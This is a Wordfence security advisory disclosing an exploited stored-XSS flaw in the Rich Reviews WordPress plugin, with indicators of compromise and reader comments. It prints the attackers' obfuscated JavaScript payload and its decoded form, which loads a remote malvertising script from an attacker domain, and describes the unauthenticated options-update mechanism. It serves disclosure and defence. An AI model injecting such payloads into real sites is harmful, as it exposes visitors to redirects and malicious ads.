Updates on WordPress security, Wordfence and what we're cooking in the lab today.

Wordfence Blog

Zero Day Vulnerability in Rich Reviews Plugin Exploited In The Wild

This entry was posted in Vulnerabilities, WordPress Security on September 24, 2019 by Mikey Veenstra   18 Replies

Description: XSS Via Unauthenticated Plugin Options Update
Affected Plugin: Rich Reviews
Affected Versions: <= 1.7.4
CVSS Score: 8.3 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

The Wordfence Threat Intelligence team is tracking a series of attacks against an unpatched vulnerability in the Rich Reviews plugin for WordPress. The estimated 16,000 sites running the plugin are vulnerable to unauthenticated plugin option updates, which can be used to deliver stored cross-site scripting (XSS) payloads.

Attackers are currently abusing this exploit chain to inject malvertising code into target websites. The malvertising code creates redirects and popup ads. Our team has been tracking this attack campaign since April of this year. You can find additional research covering this attack campaign, published by us in April and again in August of this year.

The Wordfence firewall already has built-in rules that reliably block the XSS injections in this campaign, both for Premium users and those who haven’t upgraded yet. In addition to this, we have released a new firewall rule for our Premium customers to prevent attackers from making configuration changes, such as removing the need for review approval, or defacing certain text elements.

This new Wordfence firewall rule prevents manipulation of the plugin’s settings and has been automatically deployed to our Wordfence Premium customers. The new rule will be released to free users in 30 days.

The plugin’s developers are aware of this vulnerability, but there is no patch currently available. Please see our notes on disclosure below. We recommend users find an alternative solution as soon as possible, or remove the Rich Reviews plugin from your site.

The vulnerability in this plugin is being actively exploited. The Wordfence team is seeing this in our attack data and our Security Services Team has assisted customers of our site cleaning service who have had their site compromised by an attacker who exploited this vulnerability.

Why We Are Disclosing Today

Our published disclosure policy is to ensure that developers have 7 days to fix an actively exploited vulnerability. The Rich Reviews plugin was removed from the WordPress repository 6 months ago. That means that, even if the developers release a fix, customers will not be able to update until the plugin is reinstated in the repository. We saw this forum post 5 days ago describing another site being infected via this vulnerability. At that time the developers responded with the following:

We’ve been working on an overall rewrite of this plugin for a while now, but someone out there apparently wanted us to work faster on it, and decided to exploit our plugin to get some malware out there. We’re now going double-quick on it, and hope to have it back up (and newly cozy and secure) within the next two weeks.

In view of the active exploitation that is affecting the WordPress community, the removal of the plugin from the repository, the inability for WordPress sites to update if a fix is released, and the vague timeline expressed by the developer, we have made the decision to disclose the details of this vulnerability now so that the community can protect themselves immediately.

The Vulnerability At A Glance

The two core issues in the Rich Reviews plugin are a lack of access controls for modifying the plugin’s options, and a subsequent lack of sanitization on the values of those options.

To perform options updates, the plugin checks for the presence of the POST body parameter update. If the expected value is present, the plugin iterates through other options passed through POST and updates their values as needed. Unfortunately, this check is made every time the plugin’s RichReviews class is instantiated regardless of user permissions or the current path. This means all incoming requests are capable of performing these changes.

A number of the vulnerable option values are responsible for customizing text displayed by the plugin. Improper sanitization of these values allows attackers to inject JavaScript payloads which can be triggered by visitors as well as logged-in administrators.

The Attack Campaign

While performing forensic review of an infected site, a security analyst with our site cleaning team identified suspicious log activity associated with the Rich Reviews plugin.

183.90.250.26 - [redacted] "POST /wp-admin/admin-post.php?page=fp_admin_options_page HTTP/1.0" 200 - "-" "-"

An interesting note regarding this log entry is the inclusion of the plugin’s admin-post.php page string. This type of request is commonly seen in cases where an is_admin check is improperly used to test a user’s permissions, such as in this example from earlier this year. However, that workaround is unnecessary in this case, where all incoming requests are checked for options updates regardless of path.

The payloads injected by these attackers are directly associated with a malvertising campaign we’ve reported on previously:

eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59, 10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 110, 101, 116, 46, 119, 111, 114, 107, 47, 115, 99, 114, 105, 112, 116, 115, 47, 112, 108, 97, 99, 101, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41, 59));

The obfuscated payload above executes the following script:

var script = document.createElement('script');
script.onload = function() {
};
script.src = "https://adsnet.work/scripts/place.js";
document.getElementsByTagName('head')[0].appendChild(script);

This XSS payload is nearly identical to those we’ve identified in this campaign before. The sourced third-party script place.js is similar to others we’ve seen in this malvertising campaign as well, which could trigger popup ads and unwanted redirects.

Indicators of Compromise (IOCs)

Our Threat Intelligence Team releases indicators of compromise where feasible so that other security vendors can add detection capability to their products and provide protection to their customers. The following are IOCs that we have observed associated with this attack campaign.

IP Addresses

The following IP addresses are linked to malicious activity against this vulnerability:

  • 94.229.170.38
  • 183.90.250.26
  • 69.27.116.3

Domain Names

  • adsnet.work – Hosts malicious scripts sourced by XSS injections.
    • Outbound DNS requests to this domain suggest a user on your network may have triggered a potentially dangerous redirect.

Database Content

Injected content will be present in the options table of your WordPress database, with the name rr_options.

Conclusion

Rich Reviews, a plugin with an estimated 16,000 users, was removed from the WordPress plugin repository in March for security reasons. The current version of the plugin contains a highly exploitable options update vulnerability that can be used to inject a stored XSS payload into vulnerable sites. We have identified a known malvertising campaign abusing vulnerable sites in order to deliver popup ads and potentially dangerous redirects.

Wordfence users, both Premium and those still on Free, are already protected from the attacks in this campaign due to the firewall’s robust XSS protection. There is potential for non-XSS abuse of this vulnerability, however, which has prompted us to release a new firewall rule. Wordfence Premium users have received an automatic update containing this new rule, while free users will receive an  update in thirty days.

The plugin’s developers have acknowledged the presence of these issues, but have provided an estimate of two weeks to resolve these vulnerabilities. Due to the length of this patch process and in light of the fact that the plugin has been removed from the official WordPress plugin repository, it is recommended that Rich Reviews users find an alternative solution to ensure the security of their sites.

Please consider sharing this post to help create awareness of this security issue.

Update

The Rich Reviews plugin has been adopted by a new development team, Starfish Reviews. The plugin has been reinstated in the WordPress.org repository, and new options handling code has been implemented which mitigates this vulnerability. Rich Reviews users should ensure they’ve updated to a secure version, 1.8.0 or greater. Thank you to the team at Starfish Reviews for resolving this issue!

Did you enjoy this post? Share it!

18 Comments on "Zero Day Vulnerability in Rich Reviews Plugin Exploited In The Wild"

Matt September 24, 2019 at 9:46 am

I assume that it's best practice to not only deactivate the plugin, but also to delete it?

Mikey Veenstra September 24, 2019 at 3:59 pm

Hi Matt,

The vulnerability in question will only affect your site if it's activated, but you're correct in that it's best practice not to leave a deactivated plugin around for no reason. If you're a big fan of the plugin and would like to resume use once a patch is released, you can reinstall it at that time.

The exception would be cases where a plugin requires a significant amount of setup and configuration. In many cases, deactivating a plugin will leave its configuration intact, while uninstalling it can trigger the deletion of its data. If that's the case, then deactivating it for a predefined amount of time is acceptable.

Matt September 24, 2019 at 8:33 pm

Thanks for the detailed response Mikey! Much appreciated!

Ana September 24, 2019 at 12:36 pm

Thank you for your work to ensure WordPress sites remain secure. For those of you looking for alternatives I recommend looking at JReviews which I have been using for several years.

Michele D. September 24, 2019 at 1:35 pm

I've never had this plugin yet my sites have been attacked :(

Mikey Veenstra September 24, 2019 at 4:02 pm

Hi Michele,

It's very common for these attackers to probe every site they can find for vulnerabilities like these. It's much less resource intensive at scale to launch one attack each at a bunch of sites, even those that won't be vulnerable, than it would be to test each of those for vulnerability beforehand.

huurautocuracao September 25, 2019 at 12:43 am

Hi Mike,

Thanks for this spot on blog post on it. I submitted a case with an infected site for a customer which support from exactly this. Thanks!

As far as for the developers of Rich Reviews I think they should be banned for live from wordpress.org. The way they handle themselves in this manner is negligent and more then not professional. The more if one knows that it's not rocket science to fix at all. They should be ashamed to call themselves coders.

Thanks for the super support in this!

Gr Daniël

Michele September 25, 2019 at 1:03 am

For clarity also of those who read us I want to tell you what happened to me.
I received the communication from Wordfence with repeated login from my username ... as soon as I check, I already see the redirect on the website.
In practice I had to clean the wp-post tables from those scripts and the wp-options table on the DB.
Then I had to cancel the "wordpresssadmin" account (yes 3 s) and change my username and password to my account.

Dyar Al-Ashtari September 25, 2019 at 10:27 am

I've used this plugin on some of my clients' sites, and they all got hit by this advertising code. We've patched it and re-enabled the plugin. It is a quite hacky-patch but it works fine (we've tested the exploit and it didn't work):

1. Go to WordPress Plugin Editor
2. Select Rich Reviews
3. Navigate to lib/rich-reviews-options.php
4. In the update_options() and update_option() functions place this line of code in the very first line: if(true) return;
5. This will stop any kind of option updates, from you and unauthenticated users.

NOTE: Before doing this, go to your Rich Reviews options, and remove the malware code in the "Read More" field, as it is there it is injected. Once you apply our "patch", you can't edit the options anymore, so make sure you do it before.

Thierry Krieger September 28, 2019 at 2:25 am

Good morning,

First of all, sorry about the translation, I’m French and I don’t speak much English.
I use this plugin on several of my sites. Half have suffered an attack. Will you please let me know the detailed corrections you made to remove the intrusion and correct the flaw? Then, is the plugin secure? Thank you in advance for your return.

Cordially.

Steffen September 29, 2019 at 8:54 pm

@Dyar Al-Ashtari : Can you pls explain youre patch clearer? I dont know exactly were to put this code snippet and it would help alot of people.

David Keenleyside September 25, 2019 at 8:05 pm

I've noted the following comment in the plugin support forum:
https://wordpress.org/support/topic/nuanced-media-chosen-no-longer-provide-development-for-this-plugin/

It's quite possible no fix will be forthcoming for this plugin at all, but it would be good if someone can confirm.

David Keenleyside September 25, 2019 at 8:14 pm

It would appear that Nuanced Media have a very interesting perspective on disclosure, i.e. none
https://nuancedmedia.com/wordpress-rich-reviews-plugin/

Might be worthwhile if someone takes over the wordpress repository for it and releases a single patch to neuter the exploit; along with a bold warning.

Ryan Flannagan September 27, 2019 at 9:24 am

I am the CEO of Nuanced Media the original developer of Rich Reviews. I am happy to announce that the Starfish Reviews development team has reached out to us and will be taking over active development of the Rich Reviews plugin. They have just begun their assessment but will update this thread when they have a timeline.

It’s distressing to know that something we created is being used as a vector of attack: hurting businesses, frustrating website administrators, and benefiting the worst sort of scummy spammers. We are extremely appreciative to the Starfish Reviews development team for stepping up and taking over the development of Rich Reviews.

Racquel September 28, 2019 at 2:00 pm

We created this modified plugin for a customer using Rich Reviews.

https://magicboxsoftware.com/downloads/rich-reviews-patched/

Please let me know if you have any questions.

Aaron Dwyer September 28, 2019 at 3:25 pm

Super awesome post, many thanks for letting us all know. Saved me a bunch of time, and many thanks also to Dyar Al-Ashtari for your extra comment.

Simon September 30, 2019 at 4:57 pm

For clarity, the affected plugin and the company behind it has nothing to do with the Business Reviews plugin from Rich Plugins https://richplugins.com. I use this on several client sites and wasted a couple of hours researching the issues and alternatives before realizing this!

Simon Parker October 7, 2019 at 2:58 pm

Note to all users that the rich Reviews plugin ahs been updated on WP.org and is apparently now secure...

Note i have not tested it but it would appear these specific issues mentioned above were fixed.

Follow Us

      


Protect your websites with the #1 WordPress Security Plugin

Get Premium
Over 100 million downloads

Wordfence Newsletter

Get WordPress Security Alerts and Product Updates